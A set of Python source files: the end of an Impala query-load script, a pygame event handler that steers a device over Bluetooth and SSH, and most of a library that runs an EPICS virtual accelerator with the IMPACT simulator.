logging.info("Waiting for %s" % t.name)
t.join()
self.threads = []
if self.query_rate_thread:
self.query_rate_thread.join()
self.query_rate = None
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-q", "--query", help="Run this query",
default="select * from functional_parquet.alltypestiny "
"where month < 3 and id + random() < sleep(500);")
parser.add_argument("-n", "--num_streams", help="Run this many in parallel", type=int,
default=5)
args = parser.parse_args()
# Restrict logging so it doesn't interfere with print_query_rate()
logging.basicConfig(level=logging.INFO)
# Also restrict other modules' debug output
logging.getLogger("impala_cluster").setLevel(logging.INFO)
logging.getLogger("impala_connection").setLevel(logging.WARNING)
logging.getLogger("impala.hiveserver2").setLevel(logging.CRITICAL)
s = ConcurrentWorkload(args.query, args.num_streams)
s.start()
s.print_query_rate()
if __name__ == "__main__":
main()
|
event_handler.py
|
import pygame
import sys
import core_communication
import socket
from multiprocessing import Process
from pygame.locals import *
def start_server():
execfile("server.py")
class EventLogic:
def __init__(self, _game_state, _game_gui):
self._game_state = _game_state
self._game_gui = _game_gui
self.ssh_talk = core_communication.SSHCommunication()
self.bluetooth_talk = core_communication.BluetoothCommunication()
self.movement = {
K_UP: 8,
K_DOWN: 2,
K_RIGHT: 6,
K_LEFT: 4
}
def steer(self, direction):
if direction == K_UP:
self.bluetooth_talk.command("8")
elif direction == K_RIGHT:
self.bluetooth_talk.command("4")
elif direction == K_LEFT:
self.bluetooth_talk.command("6")
elif direction == K_DOWN:
self.bluetooth_talk.command("2")
def quit(self):
pygame.quit()
sys.exit()
def get_ip_address(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def event_handler(self):
event = pygame.event.poll()
if event.type == MOUSEBUTTONUP:
if self._game_state.get_state() == "welcome":
if self._game_gui.new.get_rect().collidepoint(event.pos):
self._game_state.set_state("new season")
self.ssh_talk.connect()
self.ssh_talk.command("sudo python client1.py %s" % self.get_ip_address())
self.bluetooth_talk.connect()
serverProcess = Process(target=start_server)
serverProcess.start()
elif self._game_gui.help.get_rect().collidepoint(event.pos):
self._game_state.set_state("help")
elif self._game_gui.author.get_rect().collidepoint(event.pos):
self._game_state.set_state("author")
elif self._game_gui.setting.get_rect().collidepoint(event.pos):
self._game_state.set_state("setting")
elif self._game_gui.quit.get_rect().collidepoint(event.pos):
self.quit()
elif self._game_state.get_state() == "new season":
if self._game_gui.back.get_rect().collidepoint(event.pos):
self.ssh_talk.disconnect()
self.bluetooth_talk.disconnect()
self._game_state.set_state("welcome")
elif self._game_state.get_state() == "setting":
if self._game_gui.back.get_rect().collidepoint(event.pos):
self._game_state.set_state("welcome")
elif self._game_gui.prompt_rect.collidepoint(event.pos):
self._game_gui.set_typing_tag(True)
elif self._game_gui.save.get_rect().collidepoint(event.pos):
self.ssh_talk.specify_port(int(self._game_gui.prompt.output()[0]))
self._game_gui.prompt.reset()
else:
self._game_gui.set_typing_tag(False)
elif self._game_state.get_state() == "error":
if self._game_gui.back.get_rect().collidepoint(event.pos):
self._game_state.set_state("welcome")
elif self._game_state.get_state() in ["help", "author", "setting"]:
if self._game_gui.back.get_rect().collidepoint(event.pos):
self._game_state.set_state("welcome")
elif event.type == MOUSEMOTION or event.type == NOEVENT:
if self._game_gui.buttons:
self._game_gui.draw(self._game_state.get_state())
for button in self._game_gui.buttons:
button.set_bold(pygame.mouse.get_pos())
pygame.display.update()
elif event.type == pygame.QUIT:
self.quit()
elif event.type == KEYDOWN:
if event.key == K_ESCAPE:
self.quit()
elif event.key in [K_UP, K_DOWN, K_LEFT, K_RIGHT]:
if self._game_state.get_state() == "new season":
while True:
self._game_gui.modify_pos_pad(self.movement[event.key])
self.steer(event.key)
self.event_handler()
if pygame.key.get_pressed()[event.key] == 0:
break
elif event.key in range(48, 58) or event.key in range(256, 266):
if self._game_state.get_state() == "setting":
if self._game_gui.typing_tag:
if event.key < 100:
char = str(event.key-48)
elif event.key < 300:
char = str(event.key-256)
self._game_gui.prompt.take_char(char)
elif event.key == K_BACKSPACE:
self._game_gui.prompt.take_char("del")
|
impact.py
|
# encoding: UTF-8
"""Library for running an EPICS-based virtual accelertor using IMPACT particle tracker."""
import cothread
import logging
import math
import numpy
import os.path
import random
import re
import shutil
import subprocess
import tempfile
import threading
import time
from collections import OrderedDict
from copy import deepcopy
from cothread import catools
from phantasy.library.lattice.impact import LatticeFactory, OUTPUT_MODE_DIAG
from phantasy.library.layout import BCMElement
from phantasy.library.layout import BLElement
from phantasy.library.layout import BLMElement
from phantasy.library.layout import BPMElement
from phantasy.library.layout import BendElement
from phantasy.library.layout import CavityElement
from phantasy.library.layout import CorElement
from phantasy.library.layout import DriftElement
from phantasy.library.layout import PMElement
from phantasy.library.layout import PortElement
from phantasy.library.layout import QuadElement
from phantasy.library.layout import SeqElement
from phantasy.library.layout import SextElement
from phantasy.library.layout import SolCorElement
from phantasy.library.layout import StripElement
from phantasy.library.layout import ValveElement
from phantasy.library.parser import Configuration
__copyright__ = "Copyright (c) 2015, Facility for Rare Isotope Beams"
__author__ = "Dylan Maxwell"
# configuration options
CONFIG_MACHINE = "machine"
CONFIG_IMPACT_EXE_FILE = "impact_exe_file"
CONFIG_IMPACT_DATA_DIR = "impact_data_dir"
# default values
_DEFAULT_IMPACT_EXE = "impact"
_TEMP_DIRECTORY_SUFFIX = "_va_impact"
_DEFAULT_ERROR_VALUE = 0.0
_VA_STATUS_GOOD = "OK"
_VA_STATUS_BAD = "ERR"
# global logger instance
_LOGGER = logging.getLogger(__name__)
# global virtual accelerator
_VIRTUAL_ACCELERATOR = None
def start(layout, **kwargs):
"""Start the global virtual accelerator.
Parameters
----------
layout :
Accelerator layout object.
Keyword Arguments
-----------------
settings :
Dictionary of machine settings.
channels :
List of channel tuples with (name, properties, tags).
start :
Name of accelerator element to start simulation.
end :
Name of accelerator element to end simulation.
data_dir :
Path of directory containing IMPACT data files.
work_dir :
Path of directory for execution of IMPACT.
"""
global _VIRTUAL_ACCELERATOR
if _VIRTUAL_ACCELERATOR is None:
_VIRTUAL_ACCELERATOR = build_virtaccel(layout, **kwargs)
if _VIRTUAL_ACCELERATOR.is_started():
raise RuntimeError("Virtual Accelerator already started")
_VIRTUAL_ACCELERATOR.start()
def stop():
"""Stop the global virtual accelerator.
"""
global _VIRTUAL_ACCELERATOR
if _VIRTUAL_ACCELERATOR is None or not _VIRTUAL_ACCELERATOR.is_started():
raise RuntimeError("Virtual Accelerator not started")
_VIRTUAL_ACCELERATOR.stop()
def build_virtaccel(layout, **kwargs):
"""Convenience method to build a virtual accelerator.
Parameters
----------
layout :
Accelerator layout object
Keyword Arguments
-----------------
settings :
Dictionary of machine settings
channels :
List of channel tuples with (name, properties, tags)
start :
Name of accelerator element to start simulation
end :
Name of accelerator element to end simulation
data_dir :
Path of directory containing IMPACT data files
work_dir :
Path of directory for execution of IMPACT
Returns
-------
ret :
VirtualAccelerator instance
"""
va_factory = VirtualAcceleratorFactory(layout, **kwargs)
return va_factory.build()
class VirtualAcceleratorFactory(object):
"""Prepare a VirtualAccelerator for execution.
The main purpose of this class is to process the accelerator
description and configure the VirtualAccelerator for proper
exection.
"""
def __init__(self, layout, **kwargs):
self.layout = layout
self.config = kwargs.get("config", None)
self.settings = kwargs.get("settings", None)
self.channels = kwargs.get("channels", None)
self.start = kwargs.get("start", None)
self.end = kwargs.get("end", None)
self.data_dir = kwargs.get("data_dir", None)
self.work_dir = kwargs.get("work_dir", None)
@property
def layout(self):
return self._layout
@layout.setter
def layout(self, layout):
if not isinstance(layout, SeqElement):
raise TypeError("VirtAccelFactory: 'layout' property much be type SeqElement")
self._layout = layout
@property
def start(self):
return self._start
@start.setter
def start(self, start):
if (start is not None) and not isinstance(start, str):
raise TypeError("VirtAccelFactory: 'start' property much be type string or None")
self._start = start
@property
def end(self):
return self._end
@end.setter
def end(self, end):
if (end is not None) and not isinstance(end, str):
raise TypeError("VirtAccelFactory: 'end' property much be type string or None")
self._end = end
@property
def config(self):
return self._config
@config.setter
def config(self, config):
if not isinstance(config, Configuration):
raise TypeError("LatticeFactory: 'config' property must be type Configuration")
self._config = config
@property
def settings(self):
return self._settings
@settings.setter
def settings(self, settings):
if not isinstance(settings, dict):
raise TypeError("VirtAccelFactory: 'settings' property much be type dict")
self._settings = settings
@property
def channels(self):
return self._channels
@channels.setter
def channels(self, channels):
if not isinstance(channels, list):
raise TypeError("VirtAccelFactory: 'channels' property much be type list")
self._channels = channels
@property
def machine(self):
return self._machine
@machine.setter
def machine(self, machine):
if (machine is not None) and not isinstance(machine, str):
raise TypeError("VirtAccelFactory: 'machine' property much be type string or None")
self._machine = machine
@property
def data_dir(self):
return self._data_dir
@data_dir.setter
def data_dir(self, data_dir):
if (data_dir is not None) and not isinstance(data_dir, str):
raise TypeError("VirtAccelFactory: 'data_dir' property much be type string or None")
self._data_dir = data_dir
@property
def work_dir(self):
return self._work_dir
@work_dir.setter
def work_dir(self, work_dir):
if (work_dir is not None) and not isinstance(work_dir, str):
raise TypeError("VirtAccelFactory: 'work_dir' property much be type string or None")
self._work_dir = work_dir
def _get_config_impact_exe(self):
if self.config.has_default(CONFIG_IMPACT_EXE_FILE):
return self.config.getabspath_default(CONFIG_IMPACT_EXE_FILE, cmd=True)
return _DEFAULT_IMPACT_EXE
def _findChannel(self, name, field, handle):
for channel, props, _ in self.channels:
if props["elemName"] != name:
continue
if props["elemField"] != field:
continue
if props["elemHandle"] != handle:
continue
# IMPORTANT: Channel names originating from channel finder
# may be of type 'unicode' instead of 'str'. The cothread
# library does not have proper support for unicode strings.
return str(channel)
raise RuntimeError("VirtAccelFactory: channel not found: '{}', '{}', '{}'".format(name, field, handle))
def build(self):
"""Process the accelerator description and configure the Virtual Accelerator.
"""
settings = self.settings
data_dir = self.data_dir
if (data_dir is None) and self.config.has_default(CONFIG_IMPACT_DATA_DIR):
data_dir = self.config.getabspath_default(CONFIG_IMPACT_DATA_DIR)
if data_dir is None:
raise RuntimeError("VirtAccelFactory: No data directory provided, check the configuration")
work_dir = self.work_dir
impact_exe = self._get_config_impact_exe()
latfactory = LatticeFactory(self.layout, config=self.config, settings=self.settings)
latfactory.outputMode = OUTPUT_MODE_DIAG
latfactory.start = self.start
latfactory.end = self.end
m = re.match("(.*:)?(.*):(.*):(.*)", self.channels[0][0])
if not m:
raise RuntimeError("VirtAccelFactory: Error determining channel prefix, check channel names")
if m.group(1) is None:
chanprefix = None
else:
# IMPORTANT: chanprefix must
# be converted from unicode
chanprefix = str(m.group(1))
va = VirtualAccelerator(latfactory, settings, chanprefix, impact_exe, data_dir, work_dir)
for elem in self.layout.iter(start=self.start, end=self.end):
if isinstance(elem, CavityElement):
# Need to normalize cavity phase settings to 0~360
settings[elem.name][elem.fields.phase] = _normalize_phase(settings[elem.name][elem.fields.phase])
va.append_rw(self._findChannel(elem.name, elem.fields.phase, "setpoint"),
self._findChannel(elem.name, elem.fields.phase, "readset"),
self._findChannel(elem.name, elem.fields.phase, "readback"),
(elem.name, elem.fields.phase), desc="Cavity Phase", egu="degree", drvh=360, drvl=0)
va.append_rw(self._findChannel(elem.name, elem.fields.amplitude, "setpoint"),
self._findChannel(elem.name, elem.fields.amplitude, "readset"),
self._findChannel(elem.name, elem.fields.amplitude, "readback"),
(elem.name, elem.fields.amplitude), desc="Cavity Amplitude", egu="%")
va.append_elem(elem)
elif isinstance(elem, SolCorElement):
va.append_rw(self._findChannel(elem.name, elem.fields.field, "setpoint"),
self._findChannel(elem.name, elem.fields.field, "readset"),
self._findChannel(elem.name, elem.fields.field, "readback"),
(elem.name, elem.fields.field), desc="Solenoid Field", egu="T") # , drvratio=0.10)
va.append_rw(self._findChannel(elem.h.name, elem.h.fields.angle, "setpoint"),
self._findChannel(elem.h.name, elem.h.fields.angle, "readset"),
self._findChannel(elem.h.name, elem.h.fields.angle, "readback"),
(elem.h.name, elem.h.fields.angle), desc="Horizontal Corrector",
egu="radian") # , drvabs=0.001)
va.append_rw(self._findChannel(elem.v.name, elem.v.fields.angle, "setpoint"),
self._findChannel(elem.v.name, elem.v.fields.angle, "readset"),
self._findChannel(elem.v.name, elem.v.fields.angle, "readback"),
(elem.v.name, elem.v.fields.angle), desc="Vertical Corrector",
egu="radian") # , drvabs=0.001)
va.append_elem(elem)
elif isinstance(elem, CorElement):
va.append_rw(self._findChannel(elem.h.name, elem.h.fields.angle, "setpoint"),
self._findChannel(elem.h.name, elem.h.fields.angle, "readset"),
self._findChannel(elem.h.name, elem.h.fields.angle, "readback"),
(elem.h.name, elem.h.fields.angle), desc="Horizontal Corrector",
egu="radian") # , drvabs=0.001)
va.append_rw(self._findChannel(elem.v.name, elem.v.fields.angle, "setpoint"),
self._findChannel(elem.v.name, elem.v.fields.angle, "readset"),
self._findChannel(elem.v.name, elem.v.fields.angle, "readback"),
(elem.v.name, elem.v.fields.angle), desc="Vertical Corrector",
egu="radian") # , drvabs=0.001)
va.append_elem(elem)
elif isinstance(elem, BendElement):
va.append_rw(self._findChannel(elem.name, elem.fields.field, "setpoint"),
self._findChannel(elem.name, elem.fields.field, "readset"),
self._findChannel(elem.name, elem.fields.field, "readback"),
(elem.name, elem.fields.field), desc="Bend Relative Field", egu="none") # , drvratio=0.10)
va.append_elem(elem)
elif isinstance(elem, QuadElement):
va.append_rw(self._findChannel(elem.name, elem.fields.gradient, "setpoint"),
self._findChannel(elem.name, elem.fields.gradient, "readset"),
self._findChannel(elem.name, elem.fields.gradient, "readback"),
(elem.name, elem.fields.gradient), desc="Quadrupole Gradient",
egu="T/m") # , drvratio=0.10)
va.append_elem(elem)
elif isinstance(elem, SextElement):
_LOGGER.warning("VirtAccelFactory: Hexapole magnet element support not implemented. Ignoring channels.")
# va.append_rw(self._findChannel(elem.name, elem.fields.field, "setpoint"),
# self._findChannel(elem.name, elem.fields.field, "readset"),
# self._findChannel(elem.name, elem.fields.field, "readback"),
# (elem.name, elem.fields.field), desc="Hexapole Field", egu="T/m^2", drvrel=0.05)
# va.append_elem(elem)
elif isinstance(elem, BPMElement):
va.append_ro(self._findChannel(elem.name, elem.fields.x, "readback"),
(elem.name, elem.fields.x), desc="Horizontal Position", egu="m")
va.append_ro(self._findChannel(elem.name, elem.fields.y, "readback"),
(elem.name, elem.fields.y), desc="Vertical Position", egu="m")
va.append_ro(self._findChannel(elem.name, elem.fields.phase, "readback"),
(elem.name, elem.fields.phase), desc="Beam Phase", egu="degree")
va.append_ro(self._findChannel(elem.name, elem.fields.energy, "readback"),
(elem.name, elem.fields.energy), desc="Beam Energy", egu="MeV")
va.append_elem(elem)
elif isinstance(elem, PMElement):
va.append_ro(self._findChannel(elem.name, elem.fields.x, "readback"),
(elem.name, elem.fields.x), desc="Horizontal Position", egu="m")
va.append_ro(self._findChannel(elem.name, elem.fields.y, "readback"),
(elem.name, elem.fields.y), desc="Vertical Position", egu="m")
va.append_ro(self._findChannel(elem.name, elem.fields.xrms, "readback"),
(elem.name, elem.fields.xrms), desc="Horizontal Size", egu="m")
va.append_ro(self._findChannel(elem.name, elem.fields.yrms, "readback"),
(elem.name, elem.fields.yrms), desc="Vertical Size", egu="m")
va.append_elem(elem)
elif isinstance(elem, (BLMElement, BLElement, BCMElement)):
# ignore these diagnostic elements for now
pass
elif isinstance(elem, (ValveElement, PortElement, StripElement)):
# ignore these elements with no relevant channels
pass
elif isinstance(elem, DriftElement):
# drift elements have no channels
pass
else:
raise RuntimeError("Unsupported element type: {}".format(type(elem).__name__))
return va
class VirtualAccelerator(object):
"""VirtualAccelerator executes and manages the
EPICS IOC process and IMPACT simulation process.
"""
def __init__(self, latfactory, settings, chanprefix, impact_exe, data_dir, work_dir=None):
if not isinstance(latfactory, LatticeFactory):
raise TypeError("VirtualAccelerator: Invalid type for LatticeFactory")
self._latfactory = latfactory
if not isinstance(settings, dict):
raise TypeError("VirtualAccelerator: Invalid type for accelerator Settings")
self._settings = settings
self._chanprefix = chanprefix
self.impact_exe = impact_exe
self.data_dir = data_dir
self.work_dir = work_dir
self._epicsdb = []
self._csetmap = OrderedDict()
self._elemmap = OrderedDict()
self._fieldmap = OrderedDict()
self._readfieldmap = OrderedDict()
self._noise = 0.001
self._started = False
self._continue = False
self._rm_work_dir = False
self._ioc_process = None
self._ioc_logfile = None
self._subscriptions = None
self._lock = cothread.Event(False)
@property
def impact_exe(self):
return self._impact_exe
@impact_exe.setter
def impact_exe(self, impact_exe):
if not isinstance(impact_exe, str):
raise TypeError("VirtualAccelerator: 'impact_exe' property much be type string")
self._impact_exe = impact_exe
@property
def data_dir(self):
return self._data_dir
@data_dir.setter
def data_dir(self, data_dir):
if not isinstance(data_dir, str):
raise TypeError("VirtualAccelerator: 'data_dir' property much be type string")
self._data_dir = data_dir
@property
def work_dir(self):
return self._work_dir
@work_dir.setter
def work_dir(self, work_dir):
if (work_dir is not None) and not isinstance(work_dir, str):
raise TypeError("VirtualAccelerator: 'work_dir' property much be type string or None")
self._work_dir = work_dir
def append_rw(self, cset, rset, read, field, desc="Element", egu="", prec=5, drvh=None, drvl=None, drvabs=None,
drvrel=None, drvratio=None):
"""Append a set of read/write channels to this virtual accelerator.
The algorithm to set EPICS DRVH/DRVK is as:
- if absolute limit (drvabs) is given, use absolute
- or if relative limit (drvres) is given, use relative
- or if a ratio (drvratio) is given, use ratio
- otherwise, no limit.
:param cset: pv name of set point
:param rset: pv name of read back for set point
:param read: pv name of read back
:param field: tuple with element name and field
:param desc: element description
:param egu: EPICS record engineering unit
:param prec: EPICS display precision
:param drvabs: absolute driven limit with +-abs(drvabs)
:param drvrel: relative driven limit, value +- abs(drvabs)
:param drvratio: driven ratio of setting point value * (1 +- ratio)
"""
if self.is_started():
raise RuntimeError("VirtualAccelerator: Cannot append RW channel when started")
val = self._settings[field[0]][field[1]]
if drvabs is not None:
drvh = abs(drvabs)
drvl = - abs(drvabs)
elif drvrel is not None:
drvh = val + abs(drvabs)
drvl = val - abs(drvabs)
elif drvratio is not None:
drvh = val + abs(val * drvratio)
drvl = val - abs(val * drvratio)
self._epicsdb.append(("ao", cset, OrderedDict([
("DESC", "{} Set Point".format(desc)),
("VAL", val),
("DRVH", drvh),
("DRVL", drvl),
("PREC", prec),
("EGU", egu)
])))
self._epicsdb.append(("ai", rset, OrderedDict([
("DESC", "{} Set Point Read Back".format(desc)),
("VAL", val),
("PREC", prec),
("EGU", egu)
])))
self._epicsdb.append(("ai", read, OrderedDict([
("DESC", "{} Read Back"),
("VAL", val),
("PREC", prec),
("EGU", egu)
])))
self._csetmap[cset] = (rset, read)
self._fieldmap[cset] = field
def append_ro(self, read, field, desc="Element", egu="", prec=5):
"""Append a read-only channel to this virtual accelerator.
:param read: pv name of read back
:param field: tuple with element name and field
:param desc: element description
:param egu: EPICS record engineering unit
:param prec: EPICS display precision
"""
if self.is_started():
raise RuntimeError("VirtualAccelerator: Cannot append RO channel when started")
self._epicsdb.append(("ai", read, OrderedDict([
("DESC", "{} Read Back".format(desc)),
("VAL", "0.0"),
("PREC", prec),
("EGU", egu)
])))
if field[0] not in self._readfieldmap:
self._readfieldmap[field[0]] = OrderedDict()
self._readfieldmap[field[0]][field[1]] = read
def append_elem(self, elem):
"""Append an accelerator element to this virtual accelerator.
"""
if self.is_started():
raise RuntimeError("VirtualAccelerator: Cannot append element when started")
self._elemmap[elem.name] = elem
def is_started(self):
"""Check is virtual accelerator has been started."""
return self._started
def start(self, raise_on_wait=False):
"""Start the virtual accelerator. Spawn a new cothread to handle execution.
"""
_LOGGER.debug("VirtualAccelerator: Start")
cothread.Spawn(self._starter, raise_on_wait, raise_on_wait=True).Wait()
def _starter(self, raise_on_wait):
_LOGGER.debug("VirtualAccelerator: Start (cothread)")
if self._started:
raise RuntimeError("VirtualAccelerator: Already started")
if not os.path.isdir(self.data_dir):
raise RuntimeError("VirtualAccelerator: Data directory not found: {}".format(self.data_dir))
if self.work_dir is not None and os.path.exists(self.work_dir):
raise RuntimeError("VirtualAccelerator: Working directory already exists: {}".format(self.work_dir))
self._started = True
self._continue = True
self._executer = cothread.Spawn(self._executer, raise_on_wait=raise_on_wait)
def stop(self):
"""Stop the virtual accelerator.
Spawn a new cothread to stop gracefully.
"""
_LOGGER.debug("VirtualAccelerator: Stop")
cothread.Spawn(self._stopper, raise_on_wait=True).Wait()
def _stopper(self):
_LOGGER.debug("VirtualAccelerator: Stop (cothread)")
if self._started:
_LOGGER.debug("VirtualAccelerator: Initiate shutdown")
self._continue = False
# self._executer.Wait()
def wait(self, timeout=None):
"""Wait for the virtual accelerator to stop
"""
if self._started:
self._executer.Wait(timeout)
def _executer(self):
"""Executer method wraps the call to _execute and ensure that
the proper clean up of connections and processes.
"""
_LOGGER.debug("VirtualAccelerator: Execute (cothread)")
try:
self._execute()
finally:
_LOGGER.info("VirtualAccelerator: Cleanup")
if self._subscriptions is not None:
_LOGGER.debug("VirtualAccelerator: Cleanup: close connections")
for sub in self._subscriptions:
sub.close()
self._subscriptions = None
if self._ioc_process is not None:
_LOGGER.debug("VirtualAccelerator: Cleanup: terminate IOC process")
self._ioc_process.terminate()
self._ioc_process.wait()
self._ioc_process = None
if self._ioc_logfile is not None:
_LOGGER.debug("VirtualAccelerator: Cleanup: close IOC log file")
self._ioc_logfile.close()
self._ioc_logfile = None
if self._rm_work_dir:
_LOGGER.debug("VirtualAccelerator: Cleanup: remove work directory")
shutil.rmtree(self.work_dir)
self._executer = None
self._continue = False
self._started = False
def _execute(self):
"""Execute the virtual accelerator. This includes the following:
1. Creating a temporary working directory for execution of IMPACT.
2. Setup the working directory by symlinking from the data directory.
3. Writing the EPICS DB to the working directory (va.db).
4. Starting the softIoc and channel initializing monitors.
5. Add noise to the settings for all input (CSET) channels.
6. Generate the IMPACT lattice file in working directory (test.in).
7. Execute IMPACT simulation and read the output files (fort.??).
8. Update the READ channels of all devives.
9. Update the REST channels of input devies.
10. Repeat from step #5.
"""
_LOGGER.debug("VirtualAccelerator: Execute virtual accelerator")
if self._chanprefix is None:
chanprefix = ""
else:
chanprefix = self._chanprefix
# Add channel for sample counting
sample_cnt = chanprefix + "SVR:CNT"
self._epicsdb.append(("ai", sample_cnt, OrderedDict([
("DESC", "Sample counter for scan client"),
("VAL", 0)
])))
# Add channel for VA configuration and control
channoise = chanprefix + "SVR:NOISE"
self._epicsdb.append(("ao", channoise, OrderedDict([
("DESC", "Noise level of Virtual Accelerator"),
("VAL", 0.001),
("PREC", 5)
])))
chanstat = chanprefix + "SVR:STATUS"
self._epicsdb.append(("bi", chanstat, OrderedDict([
("DESC", "Status of Virtual Accelerator"),
("VAL", 1),
("ZNAM", "ERR"),
("ONAM", "OK"),
("PINI", "1")
])))
chancharge = chanprefix + "SVR:CHARGE"
self._epicsdb.append(("ai", chancharge, OrderedDict([
("DESC", "Q/M of Virtual Accelerator"),
("VAL", 0.0),
("PREC", 5)
])))
if self.work_dir is not None:
os.makedirs(self.work_dir)
self._rm_work_dir = False
else:
self.work_dir = tempfile.mkdtemp(_TEMP_DIRECTORY_SUFFIX)
self._rm_work_dir = True
_LOGGER.info("VirtualAccelerator: Working directory: %s", self._work_dir)
# input file paths
epicsdbpath = os.path.join(self.work_dir, "va.db")
latticepath = os.path.join(self.work_dir, "test.in")
modelmappath = os.path.join(self.work_dir, "model.map")
# output file paths
fort18path = os.path.join(self.work_dir, "fort.18")
fort24path = os.path.join(self.work_dir, "fort.24")
fort25path = os.path.join(self.work_dir, "fort.25")
epicslogpath = os.path.join(self.work_dir, "softioc.log")
if os.path.isabs(self.data_dir):
abs_data_dir = self.data_dir
else:
abs_data_dir = os.path.abspath(self.data_dir)
for datafile in os.listdir(abs_data_dir):
srcpath = os.path.join(abs_data_dir, datafile)
destpath = os.path.join(self.work_dir, datafile)
if os.path.isfile(os.path.join(abs_data_dir, datafile)):
os.symlink(srcpath, destpath)
_LOGGER.debug("VirtualAccelerator: Link data file %s to %s", srcpath, destpath)
with open(epicsdbpath, "w") as outfile:
self._write_epicsdb(outfile)
self._ioc_logfile = open(epicslogpath, "w")
self._ioc_process = _Cothread_Popen(["softIoc", "-d", "va.db"], cwd=self.work_dir,
stdout=self._ioc_logfile, stderr=subprocess.STDOUT)
self._subscriptions = []
self._subscriptions.append(catools.camonitor(channoise, self._handle_noise_monitor))
self._subscriptions.extend(catools.camonitor(self._csetmap.keys(), self._handle_cset_monitor))
while self._continue:
# update the RSET channels with new settings
for cset in self._csetmap.items():
name, field = self._fieldmap[cset[0]]
catools.caput(cset[1][0], self._settings[name][field])
settings = self._copy_settings_with_noise()
self._latfactory.settings = settings
lattice = self._latfactory.build()
catools.caput(chancharge, lattice.initialCharge)
with open(latticepath, "w") as outfile:
with open(modelmappath, "w") as mapfile:
lattice.write(outfile, mapstream=mapfile)
start = time.time()
if os.path.isfile(fort18path):
os.remove(fort18path)
if os.path.isfile(fort24path):
os.remove(fort24path)
if os.path.isfile(fort25path):
os.remove(fort25path)
impact_process = _Cothread_Popen(["mpirun", "-np", str(lattice.nprocessors),
str(self.impact_exe)], cwd=self.work_dir,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
(stdout, _, status) = impact_process.communicate()
# The virtual accelerator shutdown is likely to occur while IMPACT is executing,
# so check if virtual accelerator has been stopped before proceeding.
if not self._continue:
break
_LOGGER.info("VirtualAccelerator: IMPACT execution time: %f s", time.time() - start)
if status == 0:
catools.caput(chanstat, _VA_STATUS_GOOD)
else:
_LOGGER.warning("VirtualAccelerator: IMPACT exited with non-zero status code: %s\r\n%s", status, stdout)
catools.caput(chanstat, _VA_STATUS_BAD)
if os.path.isfile(fort18path):
fort18 = numpy.loadtxt(fort18path, usecols=(0, 1, 3))
fort18length = fort18.shape[0]
else:
_LOGGER.warning("VirtualAccelerator: IMPACT output not found: %s", fort18path)
catools.caput(chanstat, _VA_STATUS_BAD)
fort18length = 0
if os.path.isfile(fort24path):
fort24 = numpy.loadtxt(fort24path, usecols=(1, 2))
fort24length = fort24.shape[0]
else:
_LOGGER.warning("VirtualAccelerator: IMPACT output not found: %s", fort24path)
catools.caput(chanstat, _VA_STATUS_BAD)
fort24length = 0
if os.path.isfile(fort25path):
fort25 = numpy.loadtxt(fort25path, usecols=(1, 2))
fort25length = fort25.shape[0]
else:
_LOGGER.warning("VirtualAccelerator: IMPACT output not found: %s", fort25path)
catools.caput(chanstat, _VA_STATUS_BAD)
fort25length = 0
output_map = []
for elem in lattice.elements:
if elem.itype in [-28]:
output_map.append(elem.name)
output_length = len(output_map)
if fort18length < output_length:
_LOGGER.warning("VirtualAccelerator: IMPACT fort.18 length %s, expecting %s",
fort18length, output_length)
catools.caput(chanstat, _VA_STATUS_BAD)
if fort24length < output_length:
_LOGGER.warning("VirtualAccelerator: IMPACT fort.24 length %s, expecting %s",
fort24length, output_length)
catools.caput(chanstat, _VA_STATUS_BAD)
if fort25length < output_length:
_LOGGER.warning("VirtualAccelerator: IMPACT fort.25 length %s, expecting %s",
fort25length, output_length)
catools.caput(chanstat, _VA_STATUS_BAD)
def get_phase(idx):
# IMPACT computes the phase in radians,
# need to convert to degrees for PV.
return _normalize_phase(2.0 * fort18[idx, 1] * (180.0 / math.pi))
for idx in range(min(fort18length, fort24length, fort25length)):
elem = self._elemmap[output_map[idx]]
if isinstance(elem, BPMElement):
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.x], fort24[idx, 0])
catools.caput(self._readfieldmap[elem.name][elem.fields.x], fort24[idx, 0])
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.y], fort25[idx, 0])
catools.caput(self._readfieldmap[elem.name][elem.fields.y], fort25[idx, 0])
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.phase], get_phase(idx))
catools.caput(self._readfieldmap[elem.name][elem.fields.phase], get_phase(idx))
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.energy], fort18[idx, 2])
catools.caput(self._readfieldmap[elem.name][elem.fields.energy], fort18[idx, 2])
elif isinstance(elem, PMElement):
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.x], fort24[idx, 0])
catools.caput(self._readfieldmap[elem.name][elem.fields.x], fort24[idx, 0])
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.y], fort25[idx, 0])
catools.caput(self._readfieldmap[elem.name][elem.fields.y], fort25[idx, 0])
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.xrms], fort24[idx, 1])
catools.caput(self._readfieldmap[elem.name][elem.fields.xrms], fort24[idx, 1])
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.yrms], fort25[idx, 1])
catools.caput(self._readfieldmap[elem.name][elem.fields.yrms], fort25[idx, 1])
else:
_LOGGER.warning("VirtualAccelerator: Output from element type not supported: %s",
type(elem).__name__)
# Write the default error value to the remaing output PVs.
for idx in range(min(fort18length, fort24length, fort25length), output_length):
elem = self._elemmap[output_map[idx]]
if isinstance(elem, BPMElement):
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.x], _DEFAULT_ERROR_VALUE)
catools.caput(self._readfieldmap[elem.name][elem.fields.x], _DEFAULT_ERROR_VALUE)
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.y], _DEFAULT_ERROR_VALUE)
catools.caput(self._readfieldmap[elem.name][elem.fields.y], _DEFAULT_ERROR_VALUE)
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
